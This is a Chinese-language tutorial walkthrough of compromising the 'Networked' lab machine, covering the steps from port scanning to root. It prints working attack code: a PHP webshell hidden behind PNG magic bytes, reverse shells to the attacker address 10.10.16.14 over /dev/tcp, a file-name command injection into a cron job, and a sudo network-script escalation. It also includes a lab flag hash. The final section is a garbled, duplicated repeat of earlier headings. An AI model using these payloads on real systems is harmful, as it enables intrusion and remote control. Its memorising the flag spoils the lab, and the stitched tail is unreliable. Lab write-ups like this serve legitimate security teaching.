网络安全渗透测试教学文档：Networked靶机渗透过程分析<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>

使用Nmap进行端口扫描：<\/p>

nmap -p- 10.10.10.146 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

开放端口：

22\/tcp: OpenSSH 7.4 (protocol 2.0)<\/li>
80\/tcp: Apache httpd 2.4.6 (CentOS) PHP\/5.4.16<\/li>
<\/ul>
<\/li>
<\/ul>
1.2 Web目录枚举<\/h3>
使用Gobuster进行目录扫描：<\/p>
gobuster dir -u "http:\/\/10.10.10.146\/"<\/span> -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-small-words.txt -x html,txt,php -b 404,403 -t 50<\/span>
<\/span><\/span><\/code><\/pre>发现重要目录\/backup，下载备份文件：<\/p>
wget http:\/\/10.10.10.146\/backup\/backup.tar
<\/span><\/span>tar xvf backup.tar
<\/span><\/span><\/code><\/pre>2. 漏洞利用阶段<\/h2>
2.1 源码审计<\/h3>
分析备份文件中的lib.php，发现可能存在漏洞的代码。<\/p>
2.2 Apache中间件解析漏洞<\/h3>
Apache 2.4.x存在向上解析漏洞，可以上传恶意文件绕过限制：<\/p>

创建恶意文件：<\/li>
<\/ol>
echo '89 50 4E 47 0D 0A 1A 0A'<\/span> | xxd -p -r > shell.php.png
<\/span><\/span>echo '<?php system($_GET[1]);?>'<\/span> >> shell.php.png
<\/span><\/span><\/code><\/pre>
访问上传的文件执行命令：<\/li>
<\/ol>
http:\/\/10.10.10.146\/uploads\/10_10_16_14.php.png?1=dir
<\/code><\/pre>

获取反向shell：<\/li>
<\/ol>
curl 'http:\/\/10.10.10.146\/uploads\/10_10_16_14.php.png?1=%2fbin%2fbash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f10.10.16.14%2f10032+0%3e%261%27'<\/span>
<\/span><\/span><\/code><\/pre>2.3 定时任务命令注入<\/h3>
分析定时任务脚本发现命令注入漏洞：<\/p>
exec<\/span>("nohup \/bin\/rm -f <\/span>$path$value<\/span> > \/dev\/null 2>&1 &"<\/span>);
<\/span><\/span><\/code><\/pre>漏洞利用方法：<\/p>

$value<\/code>变量未经过滤，可通过特殊文件名注入命令<\/li>
例如创建名为"; cmd<\/code>的文件会导致执行：<\/li>
<\/ol>
nohup \/bin\/rm -f $path;cmd > \/dev\/null 2>&1<\/span> &
<\/span><\/span><\/code><\/pre>实际利用：<\/p>
cd \/var\/www\/html\/uploads
<\/span><\/span>reverse=<\/span>$(<\/span>echo -n 'bash -c "bash -i >\/dev\/tcp\/10.10.16.14\/10034 0>&1"'<\/span> | base64)<\/span>
<\/span><\/span>touch -- "; echo <\/span>$reverse | base64 -d | bash"<\/span>
<\/span><\/span><\/code><\/pre>获取user.txt：<\/p>
6b914b0701e297b83c7e6d052dc37247
<\/code><\/pre>
3. 权限提升阶段<\/h2>
3.1 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>3.2 分析changename.sh脚本<\/h3>
脚本路径：\/usr\/local\/sbin\/changename.sh<\/code><\/p>
脚本功能：<\/p>

为guly0网络接口创建配置<\/li>
使用ifup guly0<\/code>激活接口<\/li>
输入验证只允许字母数字字符、斜杠或破折号<\/li>
<\/ul>
3.3 CentOS网络配置漏洞<\/h3>
漏洞原理：<\/p>

CentOS的网络配置脚本对命令注入存在漏洞<\/li>
底层服务引用这些脚本时，空格后的内容会被执行<\/li>
<\/ul>
利用方法：<\/p>
sudo \/usr\/local\/sbin\/changename.sh x \/bin\/bash x x x
<\/span><\/span><\/code><\/pre>4. 关键知识点总结<\/h2>

Apache解析漏洞<\/strong>：利用文件扩展名解析顺序绕过上传限制<\/li>
命令注入<\/strong>：通过未过滤的用户输入执行系统命令<\/li>
定时任务漏洞<\/strong>：通过控制文件名实现命令注入<\/li>
网络配置提权<\/strong>：利用网络服务脚本的命令注入漏洞获取root权限<\/li>
防御措施<\/strong>：

严格过滤用户输入<\/li>
使用安全的文件上传处理方式<\/li>
避免在脚本中使用未过滤的系统命令调用<\/li>
定期更新中间件和系统组件<\/li>
<\/ul>
<\/li>
<\/ol>
5. 渗透测试流程总结<\/h2>

信息收集：端口扫描、目录枚举<\/li>
漏洞发现：源码审计、中间件版本分析<\/li>
初始访问：利用文件上传漏洞获取webshell<\/li>
权限提升：利用定时任务和网络配置漏洞<\/li>
后渗透：获取敏感信息，建立持久访问<\/li>
<\/ol>
通过这个案例，我们可以学习到从信息收集到权限提升的完整渗透测试流程，以及多种漏洞的综合利用方法。<\/p>

网络安全渗透测试教学文档：Networked靶机渗透过程分析<\/h1>

1. 信息收集阶段<\/h2>

2. 漏洞利用阶段<\/h2>

2.1 源码审计<\/h3> 分析备份文件中的lib.php，发现可能存在漏洞的代码。<\/p>

3. 权限提升阶段<\/h2>

2.1 源码审计<\/h3>
分析备份文件中的lib.php，发现可能存在漏洞的代码。<\/p>